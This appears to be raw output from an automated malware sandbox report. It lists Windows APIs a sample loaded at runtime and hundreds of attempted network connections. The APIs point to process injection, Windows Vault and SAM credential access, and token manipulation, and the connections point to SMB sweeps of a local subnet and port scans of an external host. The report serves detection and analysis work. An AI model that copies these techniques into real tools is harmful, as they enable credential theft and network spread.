kernel32.dll/SetEnvironmentVariableA - DynamicLoader: kernel32.dll/SetEnvironmentVariableW - DynamicLoader: kernel32.dll/SetFilePointerEx - DynamicLoader: kernel32.dll/WriteConsoleW - DynamicLoader: kernel32.dll/GetOEMCP - DynamicLoader: kernel32.dll/CreateProcessW - DynamicLoader: kernel32.dll/SetConsoleOutputCP - DynamicLoader: kernel32.dll/GetConsoleOutputCP - DynamicLoader: kernel32.dll/MapViewOfFile - DynamicLoader: kernel32.dll/CreateFileMappingW - DynamicLoader: kernel32.dll/UnmapViewOfFile - DynamicLoader: kernel32.dll/VirtualQueryEx - DynamicLoader: kernel32.dll/VirtualQuery - DynamicLoader: kernel32.dll/VirtualFreeEx - DynamicLoader: kernel32.dll/ReadProcessMemory - DynamicLoader: kernel32.dll/VirtualAllocEx - DynamicLoader: kernel32.dll/VirtualProtectEx - DynamicLoader: kernel32.dll/VirtualAlloc - DynamicLoader: kernel32.dll/VirtualFree - DynamicLoader: kernel32.dll/VirtualProtect - DynamicLoader: kernel32.dll/WriteProcessMemory


- DynamicLoader: kernel32.dll/ReadConsoleW - DynamicLoader: kernel32.dll/GetComputerNameExW - DynamicLoader: kernel32.dll/DeviceIoControl - DynamicLoader: kernel32.dll/OpenProcess - DynamicLoader: kernel32.dll/DuplicateHandle - DynamicLoader: kernel32.dll/GetCurrentProcess - DynamicLoader: kernel32.dll/FlushFileBuffers - DynamicLoader: kernel32.dll/GetCurrentDirectoryW - DynamicLoader: kernel32.dll/GetFileAttributesW - DynamicLoader: kernel32.dll/FindClose - DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW - DynamicLoader: kernel32.dll/FindNextFileW - DynamicLoader: kernel32.dll/GetFileSizeEx - DynamicLoader: kernel32.dll/FindFirstFileW - DynamicLoader: kernel32.dll/FileTimeToDosDateTime - DynamicLoader: kernel32.dll/GetTempFileNameA - DynamicLoader: kernel32.dll/FileTimeToLocalFileTime - DynamicLoader: kernel32.dll/DeleteFileA - DynamicLoader: kernel32.dll/CreateFileA - DynamicLoader: kernel32.dll/GetTempPathA - DynamicLoader: kernel32.dll/GetFileInformationByHandle - DynamicLoader: kernel32.dll/GetCurrentDirectoryA - DynamicLoader: kernel32.dll/SetFilePointer - DynamicLoader: kernel32.dll/LocalFree - DynamicLoader: kernel32.dll/CreateThread - DynamicLoader: kernel32.dll/CloseHandle - DynamicLoader: kernel32.dll/TerminateThread - DynamicLoader: kernel32.dll/GetLastError - DynamicLoader: kernel32.dll/Sleep - DynamicLoader: kernel32.dll/CreateFileW - DynamicLoader: kernel32.dll/LocalAlloc - DynamicLoader: kernel32.dll/WriteFile - DynamicLoader: kernel32.dll/ReadFile - DynamicLoader: kernel32.dll/FileTimeToSystemTime - DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: kernel32.dll/LCMapStringEx - DynamicLoader: CRYPTBASE.dll/SystemFunction036 
- DynamicLoader: rsaenh.DLL/CPExportKey - DynamicLoader: vaultcli.DLL/VaultEnumerateItemTypes - DynamicLoader: vaultcli.DLL/VaultEnumerateVaults - DynamicLoader: vaultcli.DLL/VaultOpenVault - DynamicLoader: vaultcli.DLL/VaultGetInformation - DynamicLoader: vaultcli.DLL/VaultEnumerateItems - DynamicLoader: vaultcli.DLL/VaultCloseVault - DynamicLoader: vaultcli.DLL/VaultFree - DynamicLoader: vaultcli.DLL/VaultGetItem - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: WINTRUST.dll/WinVerifyTrust - DynamicLoader: bcrypt.dll/BCryptOpenAlgorithmProvider - DynamicLoader: bcryptprimitives.dll/GetCipherInterface - DynamicLoader: bcrypt.dll/BCryptSetProperty - DynamicLoader: bcrypt.dll/BCryptGetProperty - DynamicLoader: bcryptprimitives.dll/GetCipherInterface - DynamicLoader: bcrypt.dll/BCryptGenerateSymmetricKey - DynamicLoader: bcrypt.dll/BCryptDecrypt - DynamicLoader: bcrypt.dll/BCryptCloseAlgorithmProvider


- DynamicLoader: bcrypt.dll/BCryptDestroyKey - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: kernel32.dll/SetThreadUILanguage - DynamicLoader: kernel32.dll/CopyFileExW - DynamicLoader: kernel32.dll/IsDebuggerPresent - DynamicLoader: kernel32.dll/SetConsoleInputExeNameW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: kernel32.dll/SetThreadUILanguage - DynamicLoader: kernel32.dll/CopyFileExW - DynamicLoader: kernel32.dll/IsDebuggerPresent - DynamicLoader: kernel32.dll/SetConsoleInputExeNameW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI - DynamicLoader: VSSAPI.DLL/CreateWriter - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: ole32.dll/CoTaskMemFree - DynamicLoader: ole32.dll/CoTaskMemAlloc - DynamicLoader: ADVAPI32.dll/LookupAccountNameW - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: ADVAPI32.dll/LookupAccountSidW - DynamicLoader: samcli.dll/NetLocalGroupGetMembers - DynamicLoader: SAMLIB.dll/SamConnect - DynamicLoader: RPCRT4.dll/NdrClientCall3 - DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW - DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW - DynamicLoader: RPCRT4.dll/RpcStringFreeW - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: SAMLIB.dll/SamOpenDomain - DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain - DynamicLoader: SAMLIB.dll/SamOpenAlias - DynamicLoader: SAMLIB.dll/SamFreeMemory - DynamicLoader: SAMLIB.dll/SamCloseHandle - DynamicLoader: SAMLIB.dll/SamGetMembersInAlias - DynamicLoader: netutils.dll/NetApiBufferFree - DynamicLoader: ole32.dll/CoCreateGuid - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: ole32.dll/StringFromCLSID - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: PROPSYS.dll/VariantToPropVariant - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: 
authZ.dll/AuthzInitializeContextFromToken - DynamicLoader: authZ.dll/AuthzInitializeObjectAccessAuditEvent2 - DynamicLoader: authZ.dll/AuthzAccessCheck - DynamicLoader: authZ.dll/AuthzFreeAuditEvent - DynamicLoader: authZ.dll/AuthzFreeContext - DynamicLoader: authZ.dll/AuthzInitializeResourceManager - DynamicLoader: authZ.dll/AuthzFreeResourceManager - DynamicLoader: RPCRT4.dll/NdrClientCall3 - DynamicLoader: RPCRT4.dll/RpcBindingCreateW - DynamicLoader: RPCRT4.dll/RpcBindingBind - DynamicLoader: RPCRT4.dll/I_RpcMapWin32Status - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: ADVAPI32.dll/EventRegister - DynamicLoader: ADVAPI32.dll/EventUnregister - DynamicLoader: ADVAPI32.dll/EventWrite - DynamicLoader: ADVAPI32.dll/EventActivityIdControl - DynamicLoader: ADVAPI32.dll/EventWriteTransfer - DynamicLoader: ADVAPI32.dll/EventEnabled - DynamicLoader: kernel32.dll/RegCloseKey


- DynamicLoader: kernel32.dll/RegSetValueExW - DynamicLoader: kernel32.dll/RegOpenKeyExW - DynamicLoader: kernel32.dll/RegQueryValueExW - DynamicLoader: kernel32.dll/RegCloseKey - DynamicLoader: wmisvc.dll/IsImproperShutdownDetected - DynamicLoader: Wevtapi.dll/EvtRender - DynamicLoader: Wevtapi.dll/EvtNext - DynamicLoader: Wevtapi.dll/EvtClose - DynamicLoader: Wevtapi.dll/EvtQuery - DynamicLoader: Wevtapi.dll/EvtCreateRenderContext - DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW - DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW - DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW - DynamicLoader: RPCRT4.dll/RpcBindingSetOption - DynamicLoader: RPCRT4.dll/RpcStringFreeW - DynamicLoader: RPCRT4.dll/NdrClientCall3 - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI - DynamicLoader: ole32.dll/CoCreateFreeThreadedMarshaler - DynamicLoader: ole32.dll/CoGetMarshalSizeMax - DynamicLoader: ole32.dll/CreateStreamOnHGlobal - DynamicLoader: ole32.dll/CoMarshalInterface - DynamicLoader: CRYPTSP.dll/CryptGenRandom - DynamicLoader: CRYPTSP.dll/CryptReleaseContext - DynamicLoader: KERNELBASE.dll/InitializeAcl - DynamicLoader: KERNELBASE.dll/AddAce - DynamicLoader: kernel32.dll/OpenProcessToken - DynamicLoader: KERNELBASE.dll/GetTokenInformation - DynamicLoader: KERNELBASE.dll/DuplicateTokenEx - DynamicLoader: KERNELBASE.dll/AdjustTokenPrivileges - DynamicLoader: kernel32.dll/SetThreadToken - DynamicLoader: KERNELBASE.dll/CheckTokenMembership - DynamicLoader: ole32.dll/CLSIDFromString - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: authZ.dll/AuthzInitializeContextFromToken - DynamicLoader: authZ.dll/AuthzInitializeResourceManager - DynamicLoader: authZ.dll/AuthzInitializeContextFromSid - DynamicLoader: authZ.dll/AuthzInitializeContextFromToken - DynamicLoader: authZ.dll/AuthzAccessCheck - DynamicLoader: authZ.dll/AuthzFreeContext - DynamicLoader: authZ.dll/AuthzFreeResourceManager - DynamicLoader: 
sechost.dll/LookupAccountSidLocalW - DynamicLoader: ole32.dll/CoGetClassObject - DynamicLoader: ole32.dll/CoGetCallContext - DynamicLoader: ole32.dll/StringFromGUID2 - DynamicLoader: ole32.dll/CoImpersonateClient - DynamicLoader: ole32.dll/CoRevertToSelf - DynamicLoader: ole32.dll/CoSwitchCallContext - DynamicLoader: ole32.dll/CoCreateGuid - DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI - DynamicLoader: ole32.dll/CoInitializeEx - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: ole32.dll/CoInitializeEx - DynamicLoader: ole32.dll/CoUninitialize

Attempts to connect to a dead IP:Port (560 unique times)

- IP: 192.168.0.0:9943 - IP: 192.168.0.0:3689 - IP: 192.168.0.109:445 - IP: 192.168.0.0:4848 - IP: 192.168.0.0:9418 - IP: 183.91.67.0:2081 (Indonesia)

- IP: 183.91.67.0:2083 (Indonesia) - IP: 183.91.67.0:2082 (Indonesia) - IP: 183.91.67.0:2087 (Indonesia) - IP: 183.91.67.0:2086 (Indonesia) - IP: 192.168.0.0:8800 - IP: 192.168.0.27:445 - IP: 183.91.67.0:444 (Indonesia) - IP: 183.91.67.0:445 (Indonesia) - IP: 183.91.67.0:5000 (Indonesia) - IP: 183.91.67.0:443 (Indonesia) - IP: 192.168.0.0:90 - IP: 192.168.0.0:99 - IP: 192.168.0.0:8443 - IP: 192.168.0.0:6666 - IP: 192.168.0.113:445 - IP: 192.168.0.0:6664 - IP: 192.168.0.142:445 - IP: 192.168.0.189:445 - IP: 192.168.0.0:9200 - IP: 192.168.0.0:6668 - IP: 192.168.0.0:6060 - IP: 183.91.67.0:1099 (Indonesia) - IP: 183.91.67.0:9080 (Indonesia) - IP: 183.91.67.0:7779 (Indonesia) - IP: 192.168.0.138:445 - IP: 183.91.67.0:789 (Indonesia) - IP: 192.168.0.143:445 - IP: 192.168.0.115:445 - IP: 183.91.67.0:7777 (Indonesia) - IP: 192.168.0.35:445 - IP: 192.168.0.0:4443 - IP: 183.91.67.0:8140 (Indonesia) - IP: 192.168.0.0:8060 - IP: 183.91.67.0:8000 (Indonesia) - IP: 192.168.0.0:7548 - IP: 192.168.0.0:8181 - IP: 192.168.0.0:7547 - IP: 192.168.0.44:445 - IP: 192.168.0.12:445 - IP: 192.168.0.0:1599 - IP: 192.168.0.70:445 - IP: 192.168.0.171:445 - IP: 192.168.0.97:445 - IP: 183.91.67.0:5672 (Indonesia) - IP: 192.168.0.0:2000 - IP: 183.91.67.0:5901 (Indonesia) - IP: 183.91.67.0:5900 (Indonesia) - IP: 192.168.0.0:21379 - IP: 192.168.0.0:8112 - IP: 192.168.0.0:5000 - IP: 192.168.0.0:5001 - IP: 192.168.0.0:5007 - IP: 192.168.0.144:445 - IP: 192.168.0.0:5009 - IP: 192.168.0.159:445 - IP: 192.168.0.175:445 - IP: 192.168.0.104:445 - IP: 192.168.0.8:445 - IP: 183.91.67.0:8089 (Indonesia) - IP: 183.91.67.0:8088 (Indonesia) - IP: 183.91.67.0:2628 (Indonesia) - IP: 183.91.67.0:8083 (Indonesia) - IP: 183.91.67.0:8082 (Indonesia)

- IP: 183.91.67.0:8081 (Indonesia) - IP: 183.91.67.0:8080 (Indonesia) - IP: 183.91.67.0:8087 (Indonesia) - IP: 183.91.67.0:8086 (Indonesia) - IP: 183.91.67.0:8085 (Indonesia) - IP: 183.91.67.0:8084 (Indonesia) - IP: 192.168.0.125:445 - IP: 192.168.0.184:445 - IP: 192.168.0.0:195 - IP: 192.168.0.167:445 - IP: 192.168.0.154:445 - IP: 183.91.67.0:8686 (Indonesia) - IP: 192.168.0.0:179 - IP: 183.91.67.0:88 (Indonesia) - IP: 192.168.0.0:1234 - IP: 192.168.0.90:445 - IP: 192.168.0.145:445 - IP: 192.168.0.0:28017 - IP: 192.168.0.0:10134 - IP: 192.168.0.0:2222 - IP: 183.91.67.0:1991 (Indonesia) - IP: 192.168.0.193:445 - IP: 192.168.0.74:445 - IP: 192.168.0.0:9100 - IP: 192.168.0.80:445 - IP: 192.168.0.55:445 - IP: 183.91.67.0:5009 (Indonesia) - IP: 192.168.0.0:1521 - IP: 183.91.67.0:2404 (Indonesia) - IP: 192.168.0.101:445 - IP: 192.168.0.0:10000 - IP: 192.168.0.0:10554 - IP: 192.168.0.0:9080 - IP: 192.168.0.0:9081 - IP: 192.168.0.56:445 - IP: 192.168.0.148:445 - IP: 183.91.67.0:4022 (Indonesia) - IP: 192.168.0.0:3260 - IP: 183.91.67.0:1741 (Indonesia) - IP: 183.91.67.0:5007 (Indonesia) - IP: 192.168.0.129:445 - IP: 192.168.0.0:8834 - IP: 192.168.0.0:33338 - IP: 183.91.67.0:5001 (Indonesia) - IP: 183.91.67.0:5055 (Indonesia) - IP: 192.168.0.174:445 - IP: 183.91.67.0:8800 (Indonesia) - IP: 183.91.67.0:195 (Indonesia) - IP: 183.91.67.0:9051 (Indonesia) - IP: 192.168.0.179:445 - IP: 183.91.67.0:7080 (Indonesia) - IP: 192.168.0.118:445 - IP: 192.168.0.5:445 - IP: 192.168.0.0:5672 - IP: 192.168.0.53:445 - IP: 192.168.0.42:445 - IP: 192.168.0.18:445 - IP: 192.168.0.0:50070 - IP: 192.168.0.0:9633 - IP: 192.168.0.98:445 - IP: 192.168.0.168:445 - IP: 192.168.0.61:445 - IP: 192.168.0.65:445

- IP: 192.168.0.0:8012 - IP: 183.91.67.0:1962 (Indonesia) - IP: 192.168.0.0:8010 - IP: 183.91.67.0:3460 (Indonesia) - IP: 192.168.0.84:445 - IP: 192.168.0.0:5901 - IP: 192.168.0.0:5900 - IP: 192.168.0.0:20547 - IP: 192.168.0.0:445 - IP: 192.168.0.0:7474 - IP: 192.168.0.0:84 - IP: 192.168.0.158:445 - IP: 192.168.0.93:445 - IP: 183.91.67.0:3790 (Indonesia) - IP: 192.168.0.88:445 - IP: 192.168.0.0:443 - IP: 183.91.67.0:5938 (Indonesia) - IP: 192.168.0.0:1111 - IP: 183.91.67.0:2000 (Indonesia) - IP: 192.168.0.0:5357 - IP: 192.168.0.100:445 - IP: 192.168.0.0:13579 - IP: 192.168.0.137:445 - IP: 192.168.0.19:445 - IP: 192.168.0.0:25105 - IP: 192.168.0.0:7080 - IP: 183.91.67.0:1400 (Indonesia) - IP: 192.168.0.0:3310 - IP: 192.168.0.136:445 - IP: 192.168.0.86:445 - IP: 192.168.0.106:445 - IP: 183.91.67.0:9008 (Indonesia) - IP: 183.91.67.0:9009 (Indonesia) - IP: 192.168.0.0:1200 - IP: 183.91.67.0:9000 (Indonesia) - IP: 183.91.67.0:9001 (Indonesia) - IP: 183.91.67.0:9002 (Indonesia) - IP: 192.168.0.133:445 - IP: 192.168.0.177:445 - IP: 192.168.0.57:445 - IP: 192.168.0.0:37777 - IP: 192.168.0.38:445 - IP: 192.168.0.0:3389 - IP: 192.168.0.0:3388 - IP: 192.168.0.14:445 - IP: 192.168.0.62:445 - IP: 192.168.0.0:5222 - IP: 192.168.0.131:445 - IP: 183.91.67.0:311 (Indonesia) - IP: 183.91.67.0:3299 (Indonesia) - IP: 192.168.0.0:9600 - IP: 183.91.67.0:4157 (Indonesia) - IP: 183.91.67.0:2181 (Indonesia) - IP: 192.168.0.110:445 - IP: 192.168.0.127:445 - IP: 183.91.67.0:9091 (Indonesia) - IP: 183.91.67.0:9090 (Indonesia) - IP: 183.91.67.0:389 (Indonesia) - IP: 192.168.0.147:445 - IP: 183.91.67.0:4567 (Indonesia) - IP: 183.91.67.0:5560 (Indonesia) - IP: 192.168.0.1:445 - IP: 192.168.0.139:445

- IP: 183.91.67.0:1723 (Indonesia) - IP: 192.168.0.0:8050 - IP: 192.168.0.156:445 - IP: 192.168.0.0:20000 - IP: 192.168.0.7:445 - IP: 183.91.67.0:8554 (Indonesia) - IP: 192.168.0.180:445 - IP: 192.168.0.49:445 - IP: 192.168.0.132:445 - IP: 192.168.0.0:89 - IP: 192.168.0.0:88 - IP: 192.168.0.108:445 - IP: 183.91.67.0:2222 (Indonesia) - IP: 192.168.0.0:83 - IP: 192.168.0.0:82 - IP: 192.168.0.0:81 - IP: 192.168.0.0:80 - IP: 192.168.0.0:8126 - IP: 192.168.0.121:445 - IP: 192.168.0.0:3299 - IP: 192.168.0.0:8123 - IP: 192.168.0.188:445 - IP: 192.168.0.59:445 - IP: 192.168.0.0:8880 - IP: 192.168.0.23:445 - IP: 192.168.0.82:445 - IP: 192.168.0.17:445 - IP: 183.91.67.0:4782 (Indonesia) - IP: 192.168.0.0:8069 - IP: 183.91.67.0:4786 (Indonesia) - IP: 183.91.67.0:3749 (Indonesia) - IP: 192.168.0.0:7890 - IP: 183.91.67.0:5800 (Indonesia) - IP: 183.91.67.0:5801 (Indonesia) - IP: 183.91.67.0:1521 (Indonesia) - IP: 192.168.0.163:445 - IP: 183.91.67.0:1911 (Indonesia) - IP: 192.168.0.0:32400 - IP: 192.168.0.0:264 - IP: 183.91.67.0:8020 (Indonesia) - IP: 192.168.0.0:5269 - IP: 183.91.67.0:84 (Indonesia) - IP: 192.168.0.123:445 - IP: 183.91.67.0:81 (Indonesia) - IP: 183.91.67.0:80 (Indonesia) - IP: 183.91.67.0:83 (Indonesia) - IP: 183.91.67.0:82 (Indonesia) - IP: 192.168.0.26:445 - IP: 192.168.0.51:445 - IP: 183.91.67.0:2480 (Indonesia) - IP: 192.168.0.50:445 - IP: 183.91.67.0:1599 (Indonesia) - IP: 183.91.67.0:7547 (Indonesia) - IP: 192.168.0.155:445 - IP: 183.91.67.0:7548 (Indonesia) - IP: 192.168.0.96:445 - IP: 192.168.0.124:445 - IP: 192.168.0.72:445 - IP: 192.168.0.0:1991 - IP: 192.168.0.0:9091 - IP: 192.168.0.0:9090 - IP: 183.91.67.0:1777 (Indonesia) - IP: 192.168.0.0:1962

- IP: 192.168.0.9:445 - IP: 192.168.0.0:9008 - IP: 192.168.0.0:9009 - IP: 192.168.0.0:10081 - IP: 192.168.0.47:445 - IP: 192.168.0.0:9002 - IP: 192.168.0.0:9000 - IP: 192.168.0.0:9001 - IP: 192.168.0.0:16010 - IP: 192.168.0.10:445 - IP: 183.91.67.0:264 (Indonesia) - IP: 192.168.0.81:445 - IP: 192.168.0.141:445 - IP: 192.168.0.0:389 - IP: 192.168.0.0:8334 - IP: 192.168.0.37:445 - IP: 183.91.67.0:5601 (Indonesia) - IP: 192.168.0.0:5601 - IP: 192.168.0.0:8098 - IP: 192.168.0.0:8099 - IP: 183.91.67.0:8443 (Indonesia) - IP: 192.168.0.0:8090 - IP: 183.91.67.0:8112 (Indonesia) - IP: 192.168.0.0:3001 - IP: 192.168.0.152:445 - IP: 192.168.0.186:445 - IP: 192.168.0.95:445 - IP: 183.91.67.0:7657 (Indonesia) - IP: 192.168.0.0:8009 - IP: 192.168.0.0:8008 - IP: 192.168.0.13:445 - IP: 192.168.0.0:9869 - IP: 192.168.0.0:9944 - IP: 192.168.0.0:8001 - IP: 192.168.0.0:8000 - IP: 192.168.0.0:8002 - IP: 192.168.0.160:445 - IP: 192.168.0.0:5938 - IP: 192.168.0.0:1471 - IP: 192.168.0.0:1777 - IP: 192.168.0.0:5986 - IP: 192.168.0.0:5985 - IP: 192.168.0.0:5984 - IP: 192.168.0.75:445 - IP: 183.91.67.0:3780 (Indonesia) - IP: 192.168.0.1:80 - IP: 183.91.67.0:8834 (Indonesia) - IP: 192.168.0.0:2455 - IP: 192.168.0.0:18245 - IP: 183.91.67.0:6001 (Indonesia) - IP: 183.91.67.0:6000 (Indonesia) - IP: 192.168.0.0:7415 - IP: 183.91.67.0:8060 (Indonesia) - IP: 183.91.67.0:8069 (Indonesia) - IP: 192.168.0.30:445 - IP: 183.91.67.0:7071 (Indonesia) - IP: 183.91.67.0:7070 (Indonesia) - IP: 192.168.0.103:445 - IP: 192.168.0.112:445 - IP: 183.91.67.0:4911 (Indonesia) - IP: 183.91.67.0:8070 (Indonesia) - IP: 192.168.0.149:445 - IP: 183.91.67.0:2376 (Indonesia)

- IP: 183.91.67.0:2375 (Indonesia) - IP: 183.91.67.0:554 (Indonesia) - IP: 183.91.67.0:8012 (Indonesia) - IP: 183.91.67.0:9081 (Indonesia) - IP: 192.168.0.0:4040 - IP: 192.168.0.29:445 - IP: 192.168.0.28:445 - IP: 183.91.67.0:1234 (Indonesia) - IP: 192.168.0.0:9191 - IP: 192.168.0.0:5555 - IP: 192.168.0.0:44818 - IP: 192.168.0.0:8866 - IP: 192.168.0.0:515 - IP: 192.168.0.41:445 - IP: 192.168.0.0:104 - IP: 192.168.0.0:102 - IP: 192.168.0.114:445 - IP: 192.168.0.172:445 - IP: 192.168.0.66:445 - IP: 183.91.67.0:4000 (Indonesia) - IP: 192.168.0.91:445 - IP: 192.168.0.0:6001 - IP: 192.168.0.0:6000 - IP: 192.168.0.0:5800 - IP: 192.168.0.0:5801 - IP: 192.168.0.0:9295 - IP: 192.168.0.76:445 - IP: 192.168.0.192:445 - IP: 192.168.0.15:445 - IP: 183.91.67.0:179 (Indonesia) - IP: 183.91.67.0:7890 (Indonesia) - IP: 192.168.0.153:445 - IP: 183.91.67.0:175 (Indonesia) - IP: 183.91.67.0:8126 (Indonesia) - IP: 183.91.67.0:8181 (Indonesia) - IP: 183.91.67.0:8123 (Indonesia) - IP: 192.168.0.0:37215 - IP: 192.168.0.24:445 - IP: 192.168.0.34:445 - IP: 192.168.0.185:445 - IP: 192.168.0.25:445 - IP: 192.168.0.0:9999 - IP: 192.168.0.1:113 - IP: 192.168.0.146:445 - IP: 192.168.0.2:445 - IP: 192.168.0.176:445 - IP: 192.168.0.0:8030 - IP: 192.168.0.87:445 - IP: 183.91.67.0:8866 (Indonesia) - IP: 192.168.0.173:445 - IP: 192.168.0.122:445 - IP: 192.168.0.0:311 - IP: 183.91.67.0:8334 (Indonesia) - IP: 192.168.0.194:445 - IP: 183.91.67.0:104 (Indonesia) - IP: 192.168.0.0:1723 - IP: 192.168.0.105:445 - IP: 183.91.67.0:3000 (Indonesia) - IP: 183.91.67.0:3001 (Indonesia) - IP: 192.168.0.119:445 - IP: 192.168.0.0:5055 - IP: 192.168.0.54:445 - IP: 192.168.0.0:1177

- IP: 192.168.0.92:445 - IP: 192.168.0.134:445 - IP: 183.91.67.0:1515 (Indonesia) - IP: 192.168.0.0:3128 - IP: 192.168.0.0:7071 - IP: 192.168.0.0:7070 - IP: 192.168.0.0:1311 - IP: 183.91.67.0:8050 (Indonesia) - IP: 192.168.0.0:7777 - IP: 192.168.0.64:445 - IP: 192.168.0.0:3780 - IP: 192.168.0.0:7779 - IP: 192.168.0.0:4000 - IP: 192.168.0.0:554 - IP: 183.91.67.0:7474 (Indonesia) - IP: 192.168.0.128:445 - IP: 183.91.67.0:8008 (Indonesia) - IP: 192.168.0.0:8889 - IP: 192.168.0.0:8888 - IP: 192.168.0.60:445 - IP: 192.168.0.78:445 - IP: 192.168.0.0:8883 - IP: 192.168.0.0:4911 - IP: 192.168.0.0:8554 - IP: 192.168.0.162:445 - IP: 192.168.0.0:1911 - IP: 192.168.0.0:9151 - IP: 192.168.0.48:445 - IP: 183.91.67.0:9180 (Indonesia) - IP: 183.91.67.0:3310 (Indonesia) - IP: 183.91.67.0:515 (Indonesia) - IP: 192.168.0.0:10080 - IP: 192.168.0.0:9443 - IP: 192.168.0.89:445 - IP: 183.91.67.0:1010 (Indonesia) - IP: 192.168.0.68:445 - IP: 192.168.0.0:12345 - IP: 192.168.0.190:445 - IP: 183.91.67.0:8030 (Indonesia) - IP: 192.168.0.69:445 - IP: 183.91.67.0:3389 (Indonesia) - IP: 183.91.67.0:3388 (Indonesia) - IP: 183.91.67.0:3260 (Indonesia) - IP: 183.91.67.0:2455 (Indonesia) - IP: 183.91.67.0:3542 (Indonesia) - IP: 183.91.67.0:3541 (Indonesia) - IP: 192.168.0.191:445 - IP: 183.91.67.0:631 (Indonesia) - IP: 192.168.0.4:445 - IP: 192.168.0.135:445 - IP: 192.168.0.0:3541 - IP: 192.168.0.0:16993 - IP: 192.168.0.0:16992 - IP: 192.168.0.0:8070 - IP: 192.168.0.0:7657 - IP: 192.168.0.0:8101 - IP: 183.91.67.0:5555 (Indonesia) - IP: 192.168.0.130:445 - IP: 192.168.0.0:8081 - IP: 192.168.0.0:8080 - IP: 192.168.0.0:8083 - IP: 192.168.0.0:8082 - IP: 192.168.0.0:8085

- IP: 192.168.0.0:8084 - IP: 192.168.0.0:8087 - IP: 192.168.0.0:8086 - IP: 192.168.0.0:8089 - IP: 192.168.0.0:8088 - IP: 192.168.0.0:631 - IP: 192.168.0.52:445 - IP: 192.168.0.178:445 - IP: 192.168.0.107:445 - IP: 183.91.67.0:5222 (Indonesia) - IP: 183.91.67.0:8098 (Indonesia) - IP: 183.91.67.0:8099 (Indonesia) - IP: 192.168.0.126:445 - IP: 192.168.0.71:445 - IP: 183.91.67.0:8090 (Indonesia) - IP: 183.91.67.0:9151 (Indonesia) - IP: 192.168.0.0:11211 - IP: 192.168.0.0:2083 - IP: 183.91.67.0:5984 (Indonesia) - IP: 192.168.0.0:2081 - IP: 192.168.0.0:2087 - IP: 183.91.67.0:4848 (Indonesia) - IP: 192.168.0.166:445 - IP: 192.168.0.150:445 - IP: 192.168.0.120:445 - IP: 192.168.0.181:445 - IP: 183.91.67.0:8002 (Indonesia) - IP: 183.91.67.0:8001 (Indonesia) - IP: 183.91.67.0:4040 (Indonesia) - IP: 183.91.67.0:6668 (Indonesia) - IP: 192.168.0.140:445 - IP: 183.91.67.0:6664 (Indonesia) - IP: 183.91.67.0:8009 (Indonesia) - IP: 183.91.67.0:6666 (Indonesia) - IP: 192.168.0.85:445 - IP: 192.168.0.182:445 - IP: 192.168.0.79:445 - IP: 192.168.0.0:9180 - IP: 183.91.67.0:8010 (Indonesia) - IP: 192.168.0.0:54138 - IP: 192.168.0.32:445 - IP: 192.168.0.0:8139 - IP: 192.168.0.67:445 - IP: 192.168.0.99:445 - IP: 192.168.0.0:444 - IP: 192.168.0.0:113 - IP: 183.91.67.0:6060 (Indonesia) - IP: 192.168.0.0:9051 - IP: 192.168.0.58:445 - IP: 192.168.0.102:445 - IP: 183.91.67.0:4664 (Indonesia) - IP: 192.168.0.94:445 - IP: 192.168.0.157:445 - IP: 192.168.0.164:445 - IP: 192.168.0.117:445 - IP: 192.168.0.0:2628 - IP: 183.91.67.0:1111 (Indonesia) - IP: 192.168.0.0:4782 - IP: 192.168.0.187:445 - IP: 192.168.0.0:4786 - IP: 192.168.0.0:23424 - IP: 183.91.67.0:1200 (Indonesia) - IP: 192.168.0.183:445

- IP: 192.168.0.0:8686 - IP: 192.168.0.170:445 - IP: 192.168.0.169:445 - IP: 192.168.0.11:445 - IP: 192.168.0.83:445 - IP: 192.168.0.0:10243 - IP: 192.168.0.0:33550 - IP: 183.91.67.0:8880 (Indonesia) - IP: 192.168.0.73:445 - IP: 183.91.67.0:8139 (Indonesia) - IP: 192.168.0.6:445 - IP: 192.168.0.0:9981 - IP: 192.168.0.165:445 - IP: 183.91.67.0:7415 (Indonesia) - IP: 192.168.0.63:445 - IP: 192.168.0.0:1400 - IP: 192.168.0.151:445 - IP: 183.91.67.0:8101 (Indonesia) - IP: 183.91.67.0:3128 (Indonesia) - IP: 192.168.0.46:445 - IP: 192.168.0.111:445 - IP: 192.168.0.0:8020 - IP: 192.168.0.0:4567 - IP: 192.168.0.0:8140 - IP: 192.168.0.77:445 - IP: 192.168.0.45:445 - IP: 183.91.67.0:5269 (Indonesia) - IP: 183.91.67.0:113 (Indonesia) - IP: 192.168.0.0:2375 - IP: 183.91.67.0:7001 (Indonesia) - IP: 183.91.67.0:5985 (Indonesia) - IP: 183.91.67.0:3689 (Indonesia) - IP: 